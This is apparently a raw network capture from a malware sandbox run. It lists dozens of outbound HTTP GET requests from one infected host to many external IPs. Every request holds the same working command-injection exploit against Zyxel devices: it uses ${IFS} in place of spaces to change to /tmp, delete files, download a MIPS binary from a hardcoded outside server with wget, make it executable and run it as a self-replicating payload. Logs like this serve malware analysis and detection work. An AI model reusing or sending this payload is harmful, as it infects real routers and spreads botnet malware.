                                    Jan 13, 2024 19:02:50.560636997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8573192.168.2.1335202135.78.45.77443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.560694933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8574192.168.2.134581272.163.143.202443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.560734034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8575192.168.2.1359504150.209.25.109443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.560785055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8576192.168.2.1344942106.9.87.145443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.560832024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8577192.168.2.133437894.81.238.231443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.560867071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8578192.168.2.134383859.111.32.17443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.560921907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8579192.168.2.1340054167.51.116.224443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.560977936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8580192.168.2.133929623.213.99.54443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.561032057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8581192.168.2.135477072.249.5.212443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.561083078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8582192.168.2.135424854.121.253.53443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.561120987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8583192.168.2.1347942219.116.72.153443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.561144114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8584192.168.2.1353298198.123.80.45443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.561209917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8585192.168.2.1333628195.153.206.16443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.561244011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8586192.168.2.135028843.27.109.224443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.561300993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8587192.168.2.135125652.111.93.184443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.561342955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8588192.168.2.135758439.199.148.42443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.561389923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8589192.168.2.1346168206.66.198.80443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.561444998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8590192.168.2.13340144.172.71.86443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.561508894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8591192.168.2.1343920140.183.108.215443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.561544895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8592192.168.2.1360186223.193.8.34443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.561611891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8593192.168.2.133726262.250.98.164443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.561662912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8594192.168.2.13529541.157.217.8443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.561726093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8595192.168.2.135230692.240.31.22443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.561794043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8596192.168.2.134577090.44.59.203443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.561844110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8597192.168.2.1358126133.134.255.125443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.561906099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8598192.168.2.133547624.151.194.161443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.561959982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8599192.168.2.1353728122.12.53.170443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.562011957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8600192.168.2.133447248.211.125.63443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.562041998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8601192.168.2.1342632158.29.73.176443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.562104940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8602192.168.2.1355794176.9.166.50443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.562165976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8603192.168.2.1339564204.219.85.77443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.562242985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8604192.168.2.1334400172.174.209.85443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.562282085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8605192.168.2.1351512126.154.159.130443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.562345028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8606192.168.2.1343092158.84.115.185443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.562378883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8607192.168.2.1342758100.238.7.32443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.562424898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8608192.168.2.1348908131.224.66.240443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.562500000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8609192.168.2.133591857.18.24.178443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.562552929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8610192.168.2.134764214.133.252.175443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.562592030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8611192.168.2.1334520213.235.102.159443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.562628031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8612192.168.2.1357538200.88.153.240443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.562676907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8613192.168.2.1352522191.186.56.177443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.562757969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8614192.168.2.1348816196.40.74.67443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.562773943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8615192.168.2.1348658123.84.42.224443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.562803030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8616192.168.2.1358764199.240.206.211443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.562845945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8617192.168.2.134608872.241.54.69443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.562896013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8618192.168.2.1342048204.57.147.13443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.562935114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8619192.168.2.134463680.200.185.47443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.562973022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8620192.168.2.13543128.255.116.239443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.563038111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8621192.168.2.134229635.226.45.143443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.563090086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8622192.168.2.135669094.126.119.187443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.563127041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8623192.168.2.134296274.138.128.210443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.563158035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8624192.168.2.1335956170.66.158.14443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.563200951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8625192.168.2.1338430115.208.64.8443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.563258886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8626192.168.2.1344522165.57.143.140443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.563282013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8627192.168.2.135276899.141.189.32443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.563359022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8628192.168.2.1359096123.106.233.90443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.563396931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8629192.168.2.1358904158.62.43.31443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.563440084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8630192.168.2.1343294165.43.118.229443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.563508034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8631192.168.2.133838092.21.244.25443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.563575983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8632192.168.2.1354702108.49.97.180443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.563627005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8633192.168.2.1344586199.137.163.58443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.563689947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8634192.168.2.136016297.191.10.46443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.563728094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8635192.168.2.1356624135.110.244.115443
                                    TimestampBytes transferredDirectionData
